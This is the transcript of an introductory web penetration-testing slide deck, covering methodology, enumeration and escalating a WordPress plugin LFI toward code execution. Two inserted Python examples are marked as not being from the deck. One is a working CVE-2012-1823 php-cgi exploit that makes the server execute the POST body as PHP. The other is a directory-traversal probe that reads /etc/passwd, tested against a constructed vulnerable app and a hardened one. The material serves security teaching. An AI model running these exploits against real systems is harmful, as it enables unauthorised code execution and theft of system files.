Introduction to Penetration Testing


Transcript of Introduction to Penetration Testing

Page 1: Introduction to Penetration Testing

Introduction to Penetration Testing

Page 2: Introduction to Penetration Testing

Table of Contents

• Overview

• Enumeration

• Tool Output

• Do We Stop Here?

• Custom Scripts

• Wpscan

• Online Research

• Testing Exploitation

• PHP LFI

• Code Execution, Yes Please!

Page 3: Introduction to Penetration Testing

Overview

• This session will cover the mindset I follow when approaching a web application

• I am going to show where many might stop, and what happens when you push further

• These types of techniques can be applied to any web application

Page 4: Introduction to Penetration Testing

Overview Cont.

• Tools Leveraged:

– Nmap

– Whatweb

– Wpscan

– Wget

– Custom scripts

– Burp Suite

– Netcat

– Google

Page 5: Introduction to Penetration Testing

Methodology Overview

• Pre-Engagement Activities – Hammer out all the details needed to conduct the test (Schedule, Scoping, Rules of Engagement, Formal Permission, etc.)

• Information Gathering and Reconnaissance – Depends on the type of test and the information you are given (Organization name, CIDR, list of URLs, source code, etc.)

• Automated Testing

• Manual Testing and Validation

• Reporting

• Remediation Support

Page 6: Introduction to Penetration Testing

Methodologies Cont.

• Penetration Testing Execution Standard (PTES):

– http://www.pentest-standard.org/index.php/Main_Page

Page 7: Introduction to Penetration Testing

Mindset is Key

• Think like an attacker and see things through a different lens:

– Upload an avatar? Hmmm, can I upload code instead?

– Download a report? Hmm, directory traversal to a different file?

• Confidence

– Without it you’ll very easily hit a wall and stop

– I tell myself a vulnerability is here; I just need to find it

Page 8: Introduction to Penetration Testing

Enumeration

• Nmap:

• WhatWeb:

Page 9: Introduction to Penetration Testing

Do We Stop Here?

• Hmmm?

Page 10: Introduction to Penetration Testing

Custom Scripts

• Web application testing requires custom scripting… there is really no way around it:

Page 11: Introduction to Penetration Testing

Custom Scripts Cont.

• Making web requests with a scripting language isn’t too difficult

• Check out tutorials online and try to automate web requests

• Making a tool for CVE-2012-1823 is a good use case because you need to make a POST request and modify several header values

– If you can write a tool for this CVE, it demonstrates concepts that can be applied to many different CVEs
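As an added example (not the tool from this deck), here is the skeleton of a CVE-2012-1823 checker in Python. CVE-2012-1823 is the php-cgi bug where a query string containing no "=" was handed to PHP as command-line options; the publicly documented way to exploit it is to pass "-d allow_url_include=1 -d auto_prepend_file=php://input" so that the POST body is executed as PHP. The script builds that query string, sets the headers by hand, and sends the POST. The target path /cgi-bin/php is an assumption, and the self-test points the request at a local echo server so it runs offline; only send this to hosts you have written permission to test.

```python
"""CVE-2012-1823 (php-cgi argument injection) request builder and sender.

Added example, not the deck's own tool. Assumes a target of the form
http://host:port/cgi-bin/php (hypothetical path). The self-test below
substitutes a local echo server for php-cgi so nothing leaves the machine.
"""
import http.client
import threading
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

# php-cgi passed a query string with no literal '=' to PHP as argv.
# Encoding '=' as %3D keeps it out of the raw query string while the CGI
# server still decodes each '+'-separated word before handing it to PHP.
PHP_CGI_OPTIONS = [
    "-d", "allow_url_include=1",            # allow auto_prepend_file to use a stream wrapper
    "-d", "auto_prepend_file=php://input",  # prepend the POST body, i.e. execute it as PHP
]


def build_query() -> str:
    """Query string that makes php-cgi execute the POST body as PHP."""
    return "+".join(urllib.parse.quote(opt, safe="/:") for opt in PHP_CGI_OPTIONS)


def send_php(host, port, path, php_code, timeout=5):
    """POST php_code to path?<options>; return (status, response body)."""
    body = php_code.encode()
    # The deck's point: a tool for this CVE has to set several headers itself.
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Content-Length": str(len(body)),
        "User-Agent": "Mozilla/5.0 (compatible; pentest-check)",
        "Connection": "close",
    }
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request("POST", f"{path}?{build_query()}", body=body, headers=headers)
    resp = conn.getresponse()
    data = resp.read().decode(errors="replace")
    conn.close()
    return resp.status, data


class _Echo(BaseHTTPRequestHandler):
    """Constructed stand-in for php-cgi: records and echoes what it received."""
    seen = {}

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length)
        type(self).seen = {
            "path": self.path,
            "body": body.decode(),
            "content_type": self.headers.get("Content-Type"),
        }
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"echo:" + body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def self_test():
    """Fire the exploit request at a local echo server; return what it saw."""
    srv = HTTPServer(("127.0.0.1", 0), _Echo)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        status, body = send_php("127.0.0.1", srv.server_address[1],
                                "/cgi-bin/php", "<?php echo 'pwned'; ?>")
    finally:
        srv.shutdown()
        srv.server_close()
    return status, body, dict(_Echo.seen)


if __name__ == "__main__":
    print(self_test())
```

Against a real php-cgi target you would replace the echo server with the host from your scope and look for the output of the PHP you sent (a marker string, not a full shell) in the response body; a 200 with the marker confirms execution, anything else means the option injection did not land.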

Page 12: Introduction to Penetration Testing

Wpscan

• Wpscan:

Page 13: Introduction to Penetration Testing

Wpscan

• Do we stop here?

Page 14: Introduction to Penetration Testing

Wpscan : Plugin Enumeration

• Wpscan: --enumerate p

Page 15: Introduction to Penetration Testing

Online Research

Page 16: Introduction to Penetration Testing

Online Research Cont.

• Hmm, our web server doesn’t return anything useful when we request “/wordpress/wp/wp-content/”

• Do we stop here?

Page 17: Introduction to Penetration Testing

Testing Exploitation

• Yeah, let’s grab “/etc/passwd”

Page 18: Introduction to Penetration Testing

PHP LFI

• Cool, so we can LFI, do we stop now?

Page 19: Introduction to Penetration Testing

PHP LFI…Now What?

• What can be done with a PHP LFI?

• It depends on which function is causing the LFI vulnerability (include(), readfile(), etc.)

• PHP functions like include() will execute any PHP code in the included file

– Yay, code execution through PHP snippets!

• PHP functions like readfile() will only display the file’s contents

– We have more work to do
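An added example covering slides 17 to 19 (not the deck's own demo): a Python LFI probe that walks up the directory tree with "../" until the response contains a root entry from /etc/passwd, run against a constructed stand-in for the PHP application. The stand-in has two endpoints: /view mimics readfile($_GET['file']) with no validation, and /safe shows the fix (resolve the path and refuse anything outside the pages directory). The parameter name "file", both endpoint paths and the fake filesystem are assumptions for the demo; a real target is the PHP app you are testing. Because the sink is a readfile()-style one, the probe only proves file read, which is exactly the "more work to do" case on slide 19.

```python
"""LFI probe plus a constructed vulnerable/hardened target so it runs offline.

Added example, not from the deck. Everything about the target (parameter
'file', endpoints /view and /safe, the temp-directory filesystem) is assumed.
"""
import os
import re
import tempfile
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Judge success by content, not status: many apps answer 200 with a blank page.
PASSWD_LINE = re.compile(r"^root:[^:]*:0:0:", re.MULTILINE)


def lfi_candidates(target="etc/passwd", max_depth=8):
    """Traversal payloads a tester tries, shallowest first."""
    for depth in range(1, max_depth + 1):
        yield "../" * depth + target


def probe_lfi(base_url, param="file", target="etc/passwd", max_depth=8, timeout=5):
    """Return the first payload that leaks the target file, or None."""
    for payload in lfi_candidates(target, max_depth):
        url = f"{base_url}?{urllib.parse.urlencode({param: payload})}"
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                body = resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:       # 403/404 still carry a body
            body = err.read().decode(errors="replace")
        except urllib.error.URLError:
            continue
        if PASSWD_LINE.search(body):
            return payload
    return None


class _FakePhpApp(BaseHTTPRequestHandler):
    """Stand-in for the PHP app. /view = readfile() on an unchecked path,
    /safe = same, but the resolved path must stay under the pages directory."""
    root = None  # filled in by start_fake_app()

    def do_GET(self):
        parsed = urllib.parse.urlsplit(self.path)
        if parsed.path not in ("/view", "/safe"):
            return self._reply(404, "not found")
        name = urllib.parse.parse_qs(parsed.query).get("file", [""])[0]
        pages = os.path.realpath(os.path.join(self.root, "var", "www", "pages"))
        requested = os.path.join(pages, name)           # vulnerable join: '..' escapes
        if parsed.path == "/safe":
            real = os.path.realpath(requested)           # collapse '..' and symlinks
            if not (real == pages or real.startswith(pages + os.sep)):
                return self._reply(403, "forbidden")
            requested = real
        try:
            with open(requested, "rb") as fh:
                return self._reply(200, fh.read().decode(errors="replace"))
        except OSError:
            return self._reply(200, "")                  # readfile() warning hidden: blank page

    def _reply(self, code, text):
        data = text.encode()
        self.send_response(code)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):
        pass


def start_fake_app():
    """Build a constructed mini filesystem and serve it; return (server, base_url)."""
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    os.makedirs(os.path.join(root, "etc"))
    os.makedirs(os.path.join(root, "var", "www", "pages"))
    with open(os.path.join(root, "etc", "passwd"), "w") as fh:   # constructed sample
        fh.write("root:x:0:0:root:/root:/bin/bash\n"
                 "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n")
    with open(os.path.join(root, "var", "www", "pages", "about.txt"), "w") as fh:
        fh.write("About us\n")
    _FakePhpApp.root = root
    srv = HTTPServer(("127.0.0.1", 0), _FakePhpApp)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"


def demo():
    """Probe the vulnerable and hardened endpoints; return (payload_or_None, payload_or_None)."""
    srv, base = start_fake_app()
    try:
        return probe_lfi(base + "/view"), probe_lfi(base + "/safe")
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(demo())
```

The pages directory sits three levels below the fake root, so the vulnerable endpoint gives up /etc/passwd at "../../../etc/passwd" while the hardened one answers 403 for every depth. If the real sink were include() rather than readfile(), the same traversal pointing at a file whose contents you control would run as PHP; that is the difference slide 19 is drawing.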

Page 20: Introduction to Penetration Testing

Code Execution? Yes, Please!

Page 21: Introduction to Penetration Testing

Code Execution? Yes, Please!

• Request:

Page 22: Introduction to Penetration Testing

Demo

Page 23: Introduction to Penetration Testing

Summary

• Tools may not give you the answer

• Very easy to hit a hurdle and quit

• You need to be curious/creative and constantly push to get more information

• Confidence and mindset go a long way